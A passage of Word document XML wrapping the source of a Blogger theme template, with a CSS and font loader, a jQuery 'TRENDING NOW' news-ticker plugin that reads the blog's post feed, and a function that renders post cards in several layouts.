    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;!--Load Icons--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;script async='async' type='text/javascript'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      //&lt;![CDATA[</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      function loadCSS(e,o,n){"use strict";var s=window.document.createElement("link"),t=o||window.document.getElementsByTagName("script")[0];s.rel="stylesheet",s.href=e,s.media="only x",t.parentNode.insertBefore(s,t),setTimeout(function(){s.media=n||"all"})}loadCSS("//maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"),loadCSS("//code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css"),loadCSS("//fonts.googleapis.com/css?family=Gilda+Display|Montserrat:300,400,800");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      //]]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;script type='text/javascript'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      //&lt;![CDATA[ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      function melesa_news(e){!function(t){var o={blogURL:"",MaxPost:10,Speed:.2,Summarylength:150,titleText:"TRENDING NOW",displayType:"reveal",Container:"#melesa_news",pBlank:"https://3.bp.blogspot.com/-IsmZS28MJMU/V6gPK2Ysu0I/AAAAAAAAPc0/wpNWe7a6EqkmWepssoXTGbgP4koYJ8xbACLcB/s1600/melesa%252Bblank.png",tagName:!1,MonthNames:["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"]};o=t.extend({},o,e),t(o.Container).addClass("loading"),t.get((""===o.blogURL?window.location.protocol+"//"+window.location.host:o.blogURL)+"/feeds/posts/summary"+(!1===o.tagName?"":"/-/"+o.tagName)+"?max-results="+o.MaxPost+"&amp;orderby=published&amp;alt=json-in-script",function(e){var n,s,i,a,d,l,r,c,m,p,u,h="",f=e.feed.entry;if(void 0!==f){for(var I=f.length,D=0;D&lt;I;D++){for(var w=f[D].link.length,y=0;y&lt;w;y++)"alternate"===f[D].link[y].rel&amp;&amp;(n=f[D].link[y].href);postcontent="content"in f[D]?f[D].content.$t:"summary"in f[D]?f[D].summary.$t:"",s=f[D].title.$t,postcontent=postcontent.replace(/&lt;\S[^&gt;]*&gt;/g,"").replace(/"/g,"&amp;quot;"),postcontent.length&gt;o.Summarylength&amp;&amp;(postcontent=postcontent.substring(0,o.Summ</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>arylength)+"..."),i=(p=f[D].published.$t.substring(0,10)).substring(0,4),a=p.substring(5,7),d=p.substring(8,10),l=o.MonthNames[parseInt(a,10)-1],c=(r=f[D].published.$t.substring(11,16)).substring(0,2),m=r.substring(2,5),u=c&lt;12?"AM":"PM",0===c&amp;&amp;(c=12),c&gt;12&amp;&amp;(c-=12),h+='&lt;li class="news-item"&gt;&lt;span title="'+l+" "+d+", "+i+'" class="date"&gt;'+c+m+" "+u+'&lt;/span&gt; &lt;a class="title" href="'+n+'"&gt;'+s+"&lt;/a&gt;&lt;/li&gt;"}t(o.Container).html('&lt;ul class="js-hidden" id="newstick"&gt;'+h+"&lt;/ul&gt;").removeClass("loading"),t("#newstick").ticker({speed:o.Speed,direction:t("#outer-wrapper").attr("class"),titleText:o.titleText,displayType:o.displayType})}else t(o.Container).html("&lt;span&gt;No result!&lt;/span&gt;").removeClass("loading")},"jsonp")}(jQuery)}var implied=!0;!function(e){e.fn.ticker=function(t){var o=e.extend({},e.fn.ticker.defaults,t);if(0==e(this).length)return window.console&amp;&amp;window.console.log?window.console.log("Element does not exist in DOM!"):alert("Element does not exist in DOM!"),!1;var n="#"+e(this).attr("id"),s=e(this).get(0).tagName;return this.each(function(){function t(e){var t,o=0;for(t in e)e.hasOwnProperty(t)&amp;&amp;o++;return o}function i(e){o.debugMode&amp;&amp;(window.console&amp;&amp;window.console.log?window.console.log(e):alert(e))}function a(){if(0==h.contentLoaded)if(o.ajaxFeed)"xml"==o.feedType?e.ajax({url:o.feedUrl,cache:!1,dataType:o.feedType,async:!0,success:function(e){count=0;for(var n=0;n&lt;e.childNodes.length;n++)"rss"==e.childNodes[n].nodeName&amp;&amp;(xmlContent=e.childNodes[n]);for(var s=0;s&lt;xmlContent.childNodes.length;s++)"channel"==xmlContent.childNodes[s].nodeName&amp;&amp;(xmlChannel=xmlContent.childNodes[s]);for(var a=0;a&lt;xmlChannel.childNodes.length;a++)if("item"==xmlChannel.childNodes[a].nodeName){xmlItems=xmlChannel.childNodes[a];for(var l,r=!1,c=0;c&lt;xmlItems.childNodes.length;c++)"title"==xmlItems.childNodes[c].nodeName?l=xmlItems.childNodes[c].lastChild.nodeValue:"link"==xmlItems.childNodes[c].nodeName&amp;&amp;(r=xmlItems.childNodes[c].lastChild.nodeValue),!1!==l&amp;&amp;""!=l&amp;&amp;!1!==r&amp;&amp;(h.newsArr["item-"+count]={type:o.titleText,content:'&lt;a href="'+r+'"&gt;'+l+"&lt;/a&gt;"},count++,l=!1,r=!1)}if(t(h.newsArr&lt;1))return i("Couldn't find any content from the XML feed for the ticker to use!"),!1;h.contentLoaded=!0,d()}}):i("Code Me!");else{if(!o.htmlFeed)return i("The ticker is set to not use any types of content! Check the settings for the ticker."),!1;if(!(e(n+" LI").length&gt;0))return i("Couldn't find HTML any content for the ticker to use!"),!1;e(n+" LI").each(function(t){h.newsArr["item-"+t]={type:o.titleText,content:e(this).html()}})}}function d(){h.contentLoaded=!0,e(h.dom.titleElem).html(h.newsArr["item-"+h.position].type),e(h.dom.contentID).html(h.newsArr["item-"+h.position].content),h.position==t(h.newsArr)-1?h.position=0:h.position++,distance=e(h.dom.contentID).width(),time=distance/o.speed,l()}function l(){if(e(h.dom.contentID).css("opacity","1"),!h.play)return!1;var t=e(h.dom.titleID).width()+20;e(h.dom.revealID).css(o.direction,t+"px"),"fade"==o.displayType?e(h.dom.revealID).hide(0,function(){e(h.dom.contentID).css(o.direction,t+"px").fadeIn(o.fadeInSpeed,r)}):"scroll"==o.displayType||e(h.dom.revealElem).show(0,function(){e(h.dom.contentID).css(o.direction,t+"px").show(),animationAction="right"==o.direction?{marginRight:distance+"px"}:{marginLeft:distance+"px"},e(h.dom.revealID).css("margin-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"+o.direction,"0px").delay(20).animate(animationAction,time,"linear",r)})}function r(){h.play?(e(h.dom.contentID).delay(o.pauseOnItems).fadeOut(o.fadeOutSpeed),"fade"==o.displayType?e(h.dom.contentID).fadeOut(o.fadeOutSpeed,function(){e(h.dom.wrapperID).find(h.dom.revealElem+","+h.dom.contentID).hide().end().find(h.dom.tickerID+","+h.dom.revealID).show().end().find(h.dom.tickerID+","+h.dom.revealID).removeAttr("style"),d()}):e(h.dom.revealID).hide(0,function(){e(h.dom.contentID).fadeOut(o.fadeOutSpeed,function(){e(h.dom.wrapperID).find(h.dom.revealElem+","+h.dom.contentID).hide().end().find(h.dom.tickerID+","+h.dom.revealID).show().end().find(h.dom.tickerID+","+h.dom.revealID).removeAttr("style"),d()})})):e(h.dom.revealElem).hide()}function c(){h.play=!1,e(h.dom.tickerID+","+h.dom.revealID+","+h.dom.titleID+","+h.dom.titleElem+","+h.dom.revealElem+","+h.dom.contentID).stop(!0,!0),e(h.dom.revealID+","+h.dom.revealElem).hide(),e(h.dom.wrapperID).find(h.dom.titleID+","+h.dom.titleElem).show().end().find(h.dom.contentID).show()}function m(){h.play=!0,h.paused=!1,r()}function p(o){switch(c(),o){case"prev":0==h.position?h.position=t(h.newsArr)-2:1==h.position?h.position=t(h.newsArr)-1:h.position=h.position-2,e(h.dom.titleElem).html(h.newsArr["item-"+h.position].type),e(h.dom.contentID).html(h.newsArr["item-"+h.position].content);break;case"next":e(h.dom.titleElem).html(h.newsArr["item-"+h.position].type),e(h.dom.contentID).html(h.newsArr["item-"+h.position].content)}h.position==t(h.newsArr)-1?h.position=0:h.position++}var u=(new Date).getTime(),h={position:0,time:0,distance:0,newsArr:{},play:!0,paused:!1,contentLoaded:!1,dom:{contentID:"#ticker-content-"+u,titleID:"#melesa-ticker-title-"+u,titleElem:"#melesa-ticker-title-"+u+" SPAN",tickerID:"#ticker-"+u,wrapperID:"#ticker-wrapper-"+u,revealID:"#rabbi-ticker-swipe-"+u,revealElem:"#rabbi-ticker-swipe-"+u+" SPAN",controlsID:"#news-ticker-controls-"+u,prevID:"#prev-"+u,nextID:"#next-"+u,playPauseID:"#play-pause-"+u}};if("UL"!=s&amp;&amp;"OL"!=s&amp;&amp;!0===o.htmlFeed)return i("Cannot use &lt;"+s.toLowerCase()+"&gt; type of element for this plugin - must of type &lt;ul&gt; or &lt;ol&gt;"),!1;"rtl"==o.direction?o.direction="right":o.direction="left",a(),e(n).wrap('&lt;div id="'+h.dom.wrapperID.replace("#","")+'"&gt;&lt;/div&gt;'),e(h.dom.wrapperID).children().remove(),e(h.dom.wrapperID).append('&lt;div id="'+h.dom.tickerID.replace("#","")+'" class="ticker"&gt;&lt;div id="'+h.dom.titleID.replace("#","")+'" class="melesa-ticker-title"&gt;&lt;span&gt;\x3c!-- --\x3e&lt;/span&gt;&lt;/div&gt;&lt;p id="'+h.dom.contentID.replace("#","")+'" class="ticker-content"&gt;&lt;/p&gt;&lt;div id="'+h.dom.revealID.replace("#","")+'" class="rabbi-ticker-swipe"&gt;&lt;span&gt;\x3c!-- --\x3e&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;'),e(h.dom.wrapperID).removeClass("no-js").addClass("ticker-wrapper has-js "+o.direction),e(h.dom.tickerElem+","+h.dom.contentID).hide(),o.controls&amp;&amp;(e(h.dom.controlsID).live("click mouseover mousedown mouseout mouseup",function(t){var o=t.target.id;if("click"==t.type)switch(o){case h.dom.prevID.replace("#",""):h.paused=!0,e(h.dom.playPauseID).addClass("paused"),p("prev");break;case h.dom.nextID.replace("#",""):h.paused=!0,e(h.dom.playPauseID).addClass("paused"),p("next");break;case h.dom.playPauseID.replace("#",""):1==h.play?(h.paused=!0,e(h.dom.playPauseID).addClass("paused"),c()):(h.paused=!1,e(h.dom.playPauseID).removeClass("paused"),m())}else"mouseover"==t.type&amp;&amp;e("#"+o).hasClass("controls")?e("#"+o).addClass("over"):"mousedown"==t.type&amp;&amp;e("#"+o).hasClass("controls")?e("#"+o).addClass("down"):"mouseup"==t.type&amp;&amp;e("#"+o).hasClass("controls")?e("#"+o</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>).removeClass("down"):"mouseout"==t.type&amp;&amp;e("#"+o).hasClass("controls")&amp;&amp;e("#"+o).removeClass("over")}),e(h.dom.wrapperID).append('&lt;ul id="'+h.dom.controlsID.replace("#","")+'" class="news-ticker-controls"&gt;&lt;li id="'+h.dom.playPauseID.replace("#","")+'" class="bs-play-pause controls"&gt;&lt;a href=""&gt;\x3c!-- --\x3e&lt;/a&gt;&lt;/li&gt;&lt;li id="'+h.dom.prevID.replace("#","")+'" class="bs-prev controls"&gt;&lt;a href=""&gt;\x3c!-- --\x3e&lt;/a&gt;&lt;/li&gt;&lt;li id="'+h.dom.nextID.replace("#","")+'" class="bs-next controls"&gt;&lt;a href=""&gt;\x3c!-- --\x3e&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;')),"fade"!=o.displayType&amp;&amp;e(h.dom.contentID).mouseover(function(){0==h.paused&amp;&amp;c()}).mouseout(function(){0==h.paused&amp;&amp;m()}),o.ajaxFeed||d()})},e.fn.ticker.defaults={speed:.1,ajaxFeed:!1,feedUrl:"",feedType:"xml",displayType:"reveal",htmlFeed:!0,debugMode:!0,controls:!0,titleText:"TRENDING NOW",direction:"ltr",pauseOnItems:3e3,fadeInSpeed:600,fadeOutSpeed:300}}(jQuery);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      //]]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/script&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:if cond='data:blog.pageType in {&amp;quot;index&amp;quot;,&amp;quot;archive&amp;quot;}'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        //&lt;![CDATA[</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        var $ = jQuery;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        //var postlayout = 'grid-post';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        function post(id,layout){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          layout = layout.toLowerCase();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          var $e = $(id);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          //grab details</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          var snippet = $e.find('.snippet').text();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          var title = $e.find('.title').text();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          var time = $e.find('.time').text();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          var image = $e.find('.image').text();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          var pauth = $e.find('.postauthor').text();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          var aimg = $e.find('.authorimg').text();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          var purl = $e.find('.purl').text();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          var comment = $e.find('.comment').text();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          time = time.split('T');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          var mnt = ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sept", "Oct", "Nov", "Dec"];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          time = time[0].split('-');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          time = mnt[Number(time[1]) - 1] + ' ' +  time[2] + ', ' + time[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          switch(layout){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            case "default":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              var c = '&lt;div class="row"&gt;&lt;div class="col-sm-6"&gt;&lt;div class="ithumb" style="background:url('+image+')"&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/4--&gt;&lt;div class="col-sm-6"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+ purl +'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--/ptitle--&gt;&lt;div class="p-meta"&gt;&lt;span class="p-author"&gt;&lt;a href="'+ purl +'"&gt;'+ pauth +'&lt;/a&gt;&lt;/span&gt; - &lt;span class="time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;div class="p-snip"&gt;'+ snippet +' &lt;br/&gt;&lt;a class="p-redmore" href="'+ purl +'" title="'+ title +'"&gt;Read More&lt;/a&gt;&lt;/div&gt;&lt;!--/psnip--&gt;&lt;/div&gt;&lt;!--/8--&gt;&lt;/div&gt;&lt;!--/row--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              $('#main').addClass(layout);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              $e.html(c);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              $e.removeClass('hidden');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            case "big-post":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              var c = '&lt;div class="row"&gt;&lt;div class="col-sm-12"&gt;&lt;div class="img_nxt"&gt;&lt;img class="ithumb" src="'+image+'"&gt;&lt;/div&gt;&lt;div class="p-cardpan"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+ purl +'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--/ptitle--&gt;&lt;div class="p-meta"&gt;&lt;span class="p-author"&gt;&lt;a href="'+ purl +'"&gt;'+ pauth +'&lt;/a&gt;&lt;/span&gt; - &lt;span class="time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;div class="p-snip"&gt;'+ snippet +' &lt;br/&gt;&lt;a class="p-redmore" href="'+ purl +'" title="'+ title +'"&gt;Read More&lt;/a&gt;&lt;/div&gt;&lt;!--/psnip--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/8--&gt;&lt;/div&gt;&lt;!--/row--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              $('#main').addClass(layout);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              $e.html(c);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              $e.removeClass('hidden');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            case "grid-post":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              var c = '&lt;div class="img_nxt"&gt;&lt;div class="ithumb" style="background:url('+image+')"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="p-cardpan"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+ purl +'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--/ptitle--&gt;&lt;div class="p-meta"&gt;&lt;span class="p-author"&gt;&lt;a href="'+ purl +'"&gt;'+ pauth +'&lt;/a&gt;&lt;/span&gt; - &lt;span class="time"&gt;'+ time </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>+'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;div class="p-snip"&gt;'+ snippet +' &lt;br/&gt;&lt;a class="p-redmore" href="'+ purl +'" title="'+ title +'"&gt;Read More&lt;/a&gt;&lt;/div&gt;&lt;!--/psnip--&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              $('#main').addClass(layout);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              $e.html(c);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              $e.parent('div').addClass('row');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              $e.removeClass('hidden').addClass('col-lg-6');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            default:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              console.log('melesa Error: Invalid post format provided. [' + layout + ']');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              var c = '&lt;div class="row"&gt;&lt;div class="col-sm-6"&gt;&lt;div class="ithumb" style="background:url('+image+')"&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/4--&gt;&lt;div class="col-sm-6"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+ purl +'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--/ptitle--&gt;&lt;div class="p-meta"&gt;&lt;span class="p-author"&gt;&lt;a href="'+ purl +'"&gt;'+ pauth +'&lt;/a&gt;&lt;/span&gt; - &lt;span class="time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;div class="p-snip"&gt;'+ snippet +' &lt;br/&gt;&lt;a class="p-redmore" href="'+ purl +'" title="'+ title +'"&gt;Read More&lt;/a&gt;&lt;/div&gt;&lt;!--/psnip--&gt;&lt;/div&gt;&lt;!--/8--&gt;&lt;/div&gt;&lt;!--/row--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              $('#main').addClass('default');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              $e.html(c);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              $e.removeClass('hidden');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        //]]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;b:if cond='data:blog.pageType == &amp;quot;index&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;div itemscope='itemscope' itemtype='http://schema.org/Blog' style='display: none;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;meta expr:content='data:blog.title' itemprop='name'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;b:if cond='data:blog.metaDescription'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;meta expr:content='data:blog.metaDescription' itemprop='description'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
